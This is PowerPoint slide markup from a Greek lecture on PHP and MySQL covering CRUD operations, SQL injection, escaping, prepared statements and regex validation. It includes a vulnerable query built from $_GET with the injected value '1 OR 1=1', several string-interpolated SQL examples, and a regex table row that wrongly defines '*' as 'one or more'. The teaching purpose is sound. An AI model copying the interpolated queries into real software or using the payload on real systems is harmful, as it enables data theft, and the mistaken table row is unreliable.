        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15210744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123D40-1531-002B-B359-C4720ABB3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2A195-DFF7-3AEC-15AA-7FE6553D858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Βρόχος ανάγνωσης όλων των γραμμών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6333020-545D-8374-31CD-B4744C99E6A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95D113C-1DA8-75FE-DCF3-D00655FE87CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="405081" y="2149019"/>
            <a:ext cx="1058091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while($row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mysqli_fetch_assoc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($result)) {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echo $row['author'] . "&lt;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&gt;";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πιο συχνή δομή σε εφαρμογές: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βρόχος εκτελείται όσες φορές υπάρχουν γραμμές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Κάθε επανάληψη ανακτά μια νέα γραμμή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Είναι ιδανικός τρόπος για λίστες, πίνακες, πίνακες δεδομένων, αποτελέσματα αναζήτησης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Όταν τελειώσουν οι γραμμές → η τιμή γίνεται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σταματά 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δομή αυτή είναι θεμελιώδης για κατανάλωση δεδομένων στη PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5330394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6E67A4-2A64-B5FE-A895-6EC65CB36E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7AD5B-9D62-398B-F6C9-7159F12E4B1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Παρουσίαση αποτελεσμάτων σε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E3784C5-F6B6-DC4F-8C4D-9DE62A79C03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C57D7D2-373C-C06E-9266-A8C9F19B20DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595999" y="1948052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 εφαρμογή ενσωματώνει δεδομένα σε HTML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"&lt;table border='1'&gt;";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($row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mysqli_fetch_assoc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($result))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echo "&lt;tr&gt;";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echo "&lt;td&gt;" . $row['author'] . "&lt;/td&gt;";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echo "&lt;td&gt;" . $row['title'] . "&lt;/td&gt;";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echo "&lt;td&gt;" . $row['year'] . "&lt;/td&gt;";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echo "&lt;/tr&gt;";}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echo "&lt;/table&gt;";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Κλείνουμε πάντα το &lt;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Δεν πρέπει να τυπώνουμε HTML μέσα σε λούπα χωρίς λόγο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Αποφεύγουμε την ανάμειξη τεράστιων HTML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block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και PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28997667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78E2A8-F8EB-CE57-A67F-CD2D22DD4D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5FA5F-FC27-8FCC-F024-4BC125E25BF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Αποδέσμευση αντικειμένου αποτελέσματος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6148454-E719-CBD7-1CFB-A70A1720F25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26DF64C-AAA1-9C9F-68D9-BD926D98C7D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595999" y="1948052"/>
            <a:ext cx="10580915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Αφού ολοκληρωθεί η ανάγνωση των δεδομένων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αποδεσμεύουμε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mysqli_free_result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($result);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Κάθε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καταναλώνει πόρους στον server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πόροι δεν απελευθερώνονται άμεσα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 εφαρμογές μεγάλης κλίμακας η μη αποδέσμευση οδηγεί σε memory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leaks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PHP κάνει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auto-free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στο τέλος του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στόχος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ρητή αποδέσμευση</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37994077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39723-FAFF-AB9E-5922-0084B5F2D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E824A-03DB-F214-4000-B289CE8E8F5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Κλείσιμο σύνδεσης με τη βάση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E46DA0E-C3FF-92DA-FFAE-6E507DFE24F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EE4323-61C7-2230-B196-5F28E6E1E5D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626144" y="1810464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Όταν τελειώσει η επεξεργασία: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mysqli_close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($conn);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Αποφυγή άσκοπων ανοιχτών συνδέσεων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Μείωση φόρτου στο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database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engine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Βελτίωση ασφάλειας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Βέλτιστη χρήση πόρων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Πολλές εφαρμογές βασίζονται στη σύνδεση που κλείνει αυτόματα στο τέλος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σύγχρονες πρακτικές ζητούν καθαρό, προβλέψιμο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lifecycle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4506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819F4E-6DAC-9E0E-7D82-84210E3F0A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3DCC6-FDFA-210E-9D39-330E25D21D1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Εισαγωγή δεδομένων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INSERT)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7FA3254-E5D3-BC2F-B900-8695F68523A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9097A67-1F2B-5614-FAFF-CD8875D535F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641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εισαγωγή νέας εγγραφής αποτελεί βασικό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δομή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 = "INSERT INTO classics (author, title, year)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VALUES ('$author', '$title', '$year')";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Μετά εκτέλεση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$result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mysqli_query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($conn, $query);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Πιθανά προβλήματα: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strings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πρέπει να έχουν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escaping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πρέπει να έχουν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sanitization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Πρέπει να ελέγξουμε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μήκος, κατηγορία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Ποτέ δεν εμπιστευόμαστε τιμές από GET/POST ως ασφαλείς για SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33983568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AD35C-DBAF-6C71-D718-F81770064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4DFF8-712A-A6BA-3CD4-8B3F7219D5C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Έλεγχος αποτυχίας εισαγωγής &amp; διαχείριση σφαλμάτων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733BEE1-8ABE-F326-E03D-74E1BCC25F9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29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F1036CB-33FE-41AF-5C68-C966782C74B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641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Όταν μια SQL εντολή αποτυγχάνει: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if(!$result)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die("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Αποτυχία εκτέλεσης: " .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mysqli_error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($conn));}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Αυτό σταματά την εφαρμογή άμεσα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επιπλέον έλεγχοι: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Duplicate keys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Παραβίαση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constraints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Μη έγκυρο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encoding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Μη σύνδεση στη βάση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Λάθος όνομα πίνακα ή στήλης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Υπέρβαση μεγέθους πεδίου</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2735374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5BAC85-859A-9D67-DD3A-5D5B049402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EE3C4-2AC0-CAD4-ACFD-6612EA8E847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δυναμικές σελίδες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BC1AAC4-0279-2F39-3D77-4A9045F8FC3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C55A82-16F1-6DBF-D64B-549A9F017F8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366422" y="2101954"/>
            <a:ext cx="10168128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PHP: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Επεξεργάζεται δεδομένα πριν σταλούν στον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Επιτρέπει την αλληλεπίδραση με βάσεις δεδομένων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Διαχειρίζεται χρήστες, συνδέσεις, συνεδρίες και cookies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Παράγει HTML, εικόνες, αρχεία, JSON, ή οποιοδήποτε περιεχόμενο χρειάζεται το σύστημα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Εκτελεί πολύπλοκη λογική που δεν θα μπορούσε να κάνει ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" sz="23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BBA42A5-2953-D406-393C-F5BC27F8197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79945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7DC75E-AFE6-D776-17F9-2B695B810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563D2-E375-9070-BBA5-E3A68E293FD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Έννοια CRUD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πυρήνας δυναμικών εφαρμογών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D9A180D-35F7-415B-8F07-BFCF24D7F75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8C11E4-5DA7-D529-6F8A-7FA316635B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641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CRUD = Create, Read, Update, Delete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Τέσσερις βασικές λειτουργίες που μπορεί να εκτελέσει κάθε σύγχρονη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εφαρμογή στα δεδομένα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συνδυασμός  λειτουργική ραχοκοκαλιά κάθε βάσης δεδομένων:</a:t>
            </a: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Create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→ εισαγωγή νέου αντικειμένου (π.χ. νέος χρήστης, νέο προϊόν)</a:t>
            </a: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Read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→ εμφάνιση δεδομένων (λίστες, αναζητήσεις, πίνακες)</a:t>
            </a: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Update → επεξεργασία υπαρχόντων δεδομένων</a:t>
            </a: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Delete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→ διαγραφή δεδομένων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00150" lvl="2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4480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922F7-7158-6F10-A483-BF40EAA5FA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B94EE-C45B-05BB-AB4D-E61C4A9B100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λογική της εισαγωγής (CREATE)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9DE982C-DF38-28EA-7D20-2504773A7A6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2D8EE28-9342-FEF1-7C85-656E4F965E96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420488" y="2006350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εισαγωγή νέων δεδομένων απαιτεί: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Φόρμα HTML με πεδία για τα δεδομένα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 αίτημα προς αρχείο PHP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Έλεγχο/καθαρισμό των τιμών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Σύνδεση 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SQL εντολής INSERT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Εκτέλεση εντολής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Επιβεβαίωση επιτυχίας ή εμφάνιση λάθους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Παράδειγμα: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  = "INSERT INTO classics (author, title, type, year) ";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 .= "VALUES ('$author', '$title', '$type', '$year')";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56350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9F44C-5A38-7813-87AD-422B89C1B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D6EEC-9744-6430-6164-B855BF057BD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Μετατροπή τιμών φόρμας σε ασφαλή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δεδομένα με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E8DC9B1-1C6E-0653-3C09-B26DCF1E4A7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600635-5980-B98B-3B7F-E57B83547F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641"/>
            <a:ext cx="10580915" cy="25699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τιμές από τη φόρμα καταλήγουν πρώτα σε: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$author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sanit_input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($_POST['author']);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$title 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sanit_input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($_POST['title']);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$type  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sanit_input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($_POST['type']);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$year  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sanit_input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($_POST['year']);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54746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90F5EB-AEEA-0BE6-BB4F-722DF59A9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EAE43-7E31-4C04-B5A5-3E58B2D27DC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Μετατροπή τιμών φόρμας σε ασφαλή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δεδομένα με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71BB732-2129-CD82-5733-D97D64C3BEA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2F50C67-4701-24C9-58B2-5481E743F603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641"/>
            <a:ext cx="10580915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καθαρισμός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trim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stripslashes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βοηθάει στο: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\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μην “σπάει” η σελίδα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μην εκτελείται HTML όταν εμφανίζουμε τα δεδομένα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αποφύγουμε εισαγωγή περίεργων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escape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characters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7537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2BDFE-6B94-EFF5-624E-848A974DF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F0125-E50E-7F4C-7C5D-B25E9BC122E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Μετατροπή τιμών φόρμας σε ασφαλή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δεδομένα με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9BE8CC6-9A70-7397-95A2-76F28F639C2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2901E8E-65A4-0EE3-D84D-175A2C56F168}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641"/>
            <a:ext cx="10580915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καθαρισμός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trim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stripslashes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htmlspecialchars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βοηθάει στο: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\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μην “σπάει” η σελίδα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μην εκτελείται HTML όταν εμφανίζουμε τα δεδομένα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 αποφύγουμε εισαγωγή περίεργων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escape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characters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9166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5385AB-7888-8518-62E5-9922CB230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60D84-2452-638B-4E94-8CB1E917C89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Εκτέλεση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33F7DCE-343F-504C-DFAC-100820682E0F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D2D1CE0-C1F1-8869-0F25-C89DB0FAE4DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641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εκτέλεση SQL γίνεται πάντα ως εξής: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$result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mysqli_query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($conn, $query);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 η εκτέλεση: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Πέτυχε → επιστρέφει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για INSERT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Απέτυχε → επιστρέφει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false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Άρα έλεγχος σφάλματος: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if(!$result)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die("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Σφάλμα κατά την εκτέλεση της εντολής: " .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mysqli_error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($conn));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342900" lvl="0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9741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21D9B1-3BD3-A6EF-F7C4-BA46EAD3D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84F28-E9A1-46B0-9B83-ABB8805DA88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Εκτέλεση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EDC0242-AEDD-9EF2-3B6B-6E1D50353CE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70073D1-6CBA-CBE1-E230-C98A8D3977F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641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Πιθανά σφάλματα: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Μη έγκυρο όνομα πίνακα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Μη έγκυρα ονόματα στηλών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Λάθος σύνδεση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Παραβίαση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constraints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Διπλό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key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Encoding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πρόβλημα (αν δεν γίνει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mysqli_set_charset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35074320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C7BF7F-298F-6C99-21B9-4AD1B84FA8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1F568-C256-C112-EFBC-7ABAE67B596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UPDATE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BA32333-DEC8-B515-4B30-E219E834F99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9B1B58E-B618-2D37-4217-1D4CB400C827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641"/>
            <a:ext cx="10580915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 = “αλλαγή μιας υπάρχουσας γραμμής”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Ανάγνωση τρέχουσας γραμμής (για εμφάνιση στη φόρμα)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Συμπλήρωση φόρμας από τον χρήστη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Καθαρισμός δεδομένων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Εκτέλεση SQL εντολής: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0" lvl="3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 = "UPDATE classics </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="3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SET author='$author', title='$title', type='$type', year='$year'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="3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WHERE id=$id";</a:t>
            </a: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Έλεγχος επιτυχίας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Ανακατεύθυνση ή μήνυμα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695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8CF7BB-8609-91EE-5636-7045C0E6D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61927-9D07-C638-A78A-199ED51F5D8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UPDATE – Delete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B9E84E8-D5C7-834D-BA94-65CEA64E1C6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FE693C-B3EE-BB67-187F-560E5DA83CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641"/>
            <a:ext cx="10580915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Προσοχή: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WHERE είναι κρίσιμη: χωρίς αυτήν ενημερώνονται ΟΛΕΣ οι γραμμές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τιμή $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πρέπει ΠΑΝΤΑ να ελεγχθεί (να είναι αριθμός, να υπάρχει)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εντολή DELETE διαγράφει δεδομένα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Πρέπει να χρησιμοποιείται πολύ προσεκτικά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5687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96BE5C-059E-5E3B-F6AE-74CC0DA97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31435-D144-5732-AAAB-F65D81E76482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λειτουργία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Delete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697D2F5-F887-7160-C5C5-1CECE91CDE7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39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90DCA3-75DD-B4BE-41F3-D28B59F9B246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641"/>
            <a:ext cx="10580915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Τυπική εντολή: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 = "DELETE FROM classics WHERE id=$id";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δεν ελέγχεται → κίνδυνος διαγραφής λάθος γραμμής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λείπει η WHERE → διαγράφονται όλα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δεν επιβεβαιώνεται ενέργεια → χρήστης διαγράψει κατά λάθος σημαντικά στοιχεία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έχεις SQL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Injection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→ επιτιθέμενος μπορεί να σβήσει ολόκληρο πίνακα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1771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F9645C-7E68-7568-CB5F-822C17F44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93CA7-00B1-678D-4D01-BF17BF00F72D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αρχιτεκτονική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Client–Server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D47F092-27D0-2B9A-AF40-5817DD61C45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1DF7A2E-1570-E2AB-AB33-86FDBA3E4B81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908304" y="1579440"/>
            <a:ext cx="10168128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χρήστης ζητά να ανοίξει σελίδα, ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" sz="2300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" err="1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b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill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του στέλνει αίτημα HTTP στον server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στέλνει αίτημα (HTTP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request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προς μια σελίδα PHP (π.χ.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page.php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2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διαβάζει αίτημα, ανακτά παραμέτρους, περιβάλλον και δεδομένα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2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2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PHP εκτελεί λογική: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διαβάζει μεταβλητές GET/POST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ελέγχει δικαιώματα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συνδέεται σε βάση</a:t>
            </a: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επεξεργάζεται στοιχεία χρήστη</a:t>
            </a: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2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2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αποτέλεσμα μετατρέπεται σε HTML, το οποίο ο server επιστρέφει στον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2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marR="0" lvl="0" indent="-4572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arabicPeriod" startAt="2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απλώς προβάλλει — δεν γνωρίζει τίποτα για κώδικα PHP</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="2300" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill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59EFCF-3FF8-46B4-FC69-FA6FC170A7E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042599A8-828E-4D05-A7E8-72DAB8A016A8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88827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FD634-23DE-D518-EBC8-A2A22333AB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B033A-3F44-9BE5-5B51-AC615380F75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 Injection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DA019F6-D5EA-3B5A-0201-2F203E9A9D6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9AAE76A-CEB2-87B6-A91C-C2CC97DC31A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641"/>
            <a:ext cx="10580915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Injection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μέθοδος επίθεσης όπου ο επιτιθέμενος “εισάγει” κακόβουλη SQL μέσα στα δεδομένα που στέλνει στη φόρμα ή στο UR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server εκτελεί αυτή την SQL κατά λάθος, επειδή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εφαρμογή δέχτηκε τα δεδομένα χωρίς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validation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ενσωμάτωσε “ως έχουν” στο SQL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επιτιθέμενος αξιοποίησε αυτή τη στιγμή αδυναμίας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Επιτίθεται μέσω του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input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το οποίο η εφαρμογή “μεταφράζει” σε SQL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42133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F3662-AE2E-0012-A668-E6C19D5A2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3AEBF-6DB8-1582-788A-E14F174E5CD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 Injection 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F5B347A-9565-5F0E-8C16-C3AF0540C0A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20734E-B95B-2B86-3423-57E286CD4DE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641"/>
            <a:ext cx="10580915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Έστω φόρμα:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="3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&lt;input type="text" name="id"&gt;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28800" lvl="3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$id = $_GET['id'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="3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$query = "SELECT * FROM users WHERE id=$id";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="3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mysqli_query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($conn, $query);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 ο χρήστης γράψει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“1”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SELECT * FROM users WHERE id=1;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γράψει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 OR 1=1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SELECT * FROM users WHERE id=1 OR 1=1;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OR 1=1 είναι πάντα TRUE → Η βάση επιστρέφει όλους τους χρήστες.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180167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105F25-88EC-FD78-74B8-5A13DC4046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2CDB31-2927-B8BF-C453-557EB81777E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scaping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ειδικών χαρακτήρων πριν την εισαγωγή (</a:t>
            </a:r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real_escape_string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332CC89-5052-DC62-0DBA-48DF3ED7A7E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869FDC1-C443-CF5E-BEE3-3BCCCD9EFD07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585951" y="1997641"/>
            <a:ext cx="1058091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Prepared statements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βασική άμυνα ενάντια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SQL Injection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απλή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escaping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$author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mysqli_real_escape_string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($conn, $author);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$title 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mysqli_real_escape_string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($conn, $title);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0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escaping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προστατεύει από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quotes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που “σπάνε” τα SQL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strings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καθαρίζει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backslashes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καθιστά την SQL συντακτικά ορθή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7914886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D8CE15-5425-92C3-9847-C834BA0824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7E98A8-CA29-3E3C-B664-F59FA127C25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Prepared Statements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1D2A8B0-B01C-7BE5-CB52-9272C2A22F1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674BC0-4E1F-DCD0-D3CD-A098014442D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612077" y="1919264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prepared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χωρίζουν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 δομή της SQL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από τις τιμές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Έτσι δεν μπορούν οι τιμές να εκτελεστούν σαν SQL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stmt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mysqli_prepare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($conn,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"INSERT INTO classics (author, title, type, year) VALUES (?, ?, ?, ?)");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mysqli_stmt_bind_param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stmt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"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ssss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", $author, $title, $type, $year);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mysqli_stmt_execute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stmt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Οφέλη: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Απόλυτη προστασία από SQL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injection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Αποδοτικότητα (η SQL προετοιμάζεται και εκτελείται επαναλαμβανόμενα)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Σωστός διαχωρισμός δεδομένων–εντολών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5126772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71292-5AEC-CC7D-B48B-2F4393942D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06CF-627B-7528-5ACB-987385FB059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Prepared Statements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SELECT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52466B9-16EF-1923-90BD-33B6DEE9C7B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FB6C6AA-ED25-370E-E90D-ACF3F307CC0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612077" y="1919264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ανάκτηση δεδομένων:</a:t>
            </a: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stmt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mysqli_prepare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($conn,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"SELECT author, title, year FROM classics WHERE id = ?");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mysqli_stmt_bind_param($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stmt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"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", $id);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mysqli_stmt_execute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stmt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$result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mysqli_stmt_get_result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stmt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$row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mysqli_fetch_assoc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($result);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Οφέλη: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Προστασία από κακόβουλα I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υπάρχει τρόπος εισαγωγής SQL μέσω της τιμής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Χρησιμοποιούνται παντού σε σύγχρονα συστήματα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3874113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0F6823-470D-0C38-EA25-F36748A24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DAC0E-E56A-C269-DAEF-FDFC48120B5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Regular expression (regex)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5657133-2B4D-8F35-68F4-B48E2CFEF00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F973B95-4814-4CF8-7EC8-C79F52BFAF90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612077" y="1919264"/>
            <a:ext cx="1058091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κανόνας–μοτίβο που περιγράφει ένα σύνολο επιτρεπτών συμβολοσειρών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“λεξικό” που καθορίζει τι θεωρείται έγκυρη είσοδος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“Μόνο γράμματα”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“Ακριβώς 10 ψηφία”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“Email στη σωστή μορφή”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“URL που ξεκινά με http:// ή https://”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“Κωδικός με 8+ χαρακτήρες, 1 γράμμα, 1 αριθμό”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regex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είναι η γλώσσα των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validation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rules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Χωρίς αυτά, η εφαρμογή δεν μπορεί να ξεχωρίσει έγκυρα από μη έγκυρα δεδομένα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7384962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FE71E1-CF47-C0E5-40B0-591CE8628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1FE1AF-477E-9D4C-F504-CDFF5DD0E6C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Βασικές έννοιες των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0A24A30-9BC3-D205-80C8-6A702F6EFB4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D289F05-5775-6B40-4542-F3D4AF357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781396"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1008743" y="1728216"/>
          <a:ext cx="9604828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2414">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3727054440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4802414">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="42473101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2400" dirty="0"/>
                        <a:t>Σύμβολο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Σημασία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560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οποιοσδήποτε χαρακτήρας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8131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/>
                        <a:t>[]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σύνολο χαρακτήρων (π.χ. [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" sz="2400" dirty="0" err="1"/>
                        <a:t>abc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" sz="2400" dirty="0"/>
                        <a:t>])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464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/>
                        <a:t>[^]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αρνητικό σύνολο (π.χ. [^0-9])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258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/>
                        <a:t>-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εύρος (π.χ. [0-9], [a-z])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811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/>
                        <a:t>^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αρχή συμβολοσειράς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653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/>
                        <a:t>$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dirty="0"/>
                        <a:t>τέλος συμβολοσειράς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9722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/>
                        <a:t>()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Ομάδα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2267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/>
                        <a:t>+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1 ή περισσότερες φορές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03632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/>
                        <a:t>*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1 ή περισσότερες φορές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051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l-GR" sz="2400" dirty="0"/>
                        <a:t>{</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" sz="2400" dirty="0" err="1"/>
                        <a:t>n,m</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" sz="2400" dirty="0"/>
                        <a:t>}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επανάληψη από n έως m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17338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8575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A837D-8905-19F0-AA9F-6DF3A6E35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CAE82-61ED-5575-FA14-F52249CC999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Παράδειγμα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0BABD1D6-DB17-316C-D3AE-CB4504E230B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0B63A1-80AA-11A8-5DC7-8188D99923EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="1940750"/>
            <a:ext cx="10580915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^[A-Za-z ]+$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4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“Από αρχή μέχρι τέλος, μόνο λατινικά γράμματα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κενά, τουλάχιστον μία φορά”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regex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email: 	^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[A-Za-z]{2,}$/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^[...] ⇒ αρχή συμβολοσειράς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[a-zA-Z0-9._%+-]+ ⇒ πριν το @ επιτρέπονται γράμματα, αριθμοί και σύμβολα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@ ⇒ πρέπει να υπάρχει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[a-zA-Z0-9.-]+ ⇒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domain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\. ⇒ τελεία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[A-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Za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-z]{2,}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κατάληξη τουλάχιστον 2 γραμμάτων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 ⇒ τέλος συμβολοσειράς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το email δεν ταιριάζει → η εφαρμογή το απορρίπτει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0146692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1A8A34-43C6-04F2-675E-5FDD660EC6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12B17-B8CC-6766-2552-399CD52F900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URL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28842D4-4FA2-D7CF-6D77-1340029B476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9369AD-9F7C-E15D-8923-ED777210B39C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909174" y="2403373"/>
            <a:ext cx="10580915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/^(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http|https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):\/\/[A-Za-z0-9\.-]+\.[A-Za-z]{2,}/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4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URL πρέπει να ξεκινά με http:// ή https://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Μετά ακολουθούν γράμματα, αριθμοί, τελείες ή παύλες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Να υπάρχει τουλάχιστον μία τελεία στο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domain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Κατάληξη τομέα 2+ γραμμάτων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2743771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DAAB0-699E-F196-1273-4AF4880ABF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A1581-36DE-95FC-E97F-2E319D4E79A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Regex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τηλέφωνο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B3253F1-19E2-D8C0-2F3B-594AA69BBA5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49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DF5B96-4327-5738-048C-548CF47A090C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805542" y="2559851"/>
            <a:ext cx="10580915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/^69[0-9]{8}$/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4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Πρέπει να ξεκινά με 69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Ακολουθούν 8 αριθμοί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Σύνολο: 10 ψηφία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HTML5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προσφέρει ενσωματωμένο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validation,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χωρίς καθόλου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JavaScript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274420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D925F6-35E8-582B-D0A6-5440FC403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7F36A-B35C-80D3-DDBB-084DA5BB4C6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Υπερ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-καθολικές μεταβλητές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6537698-45C0-E67D-AF30-DE601D4D04C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098E41-37FC-DDFF-8A38-A4F0ACB6987D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
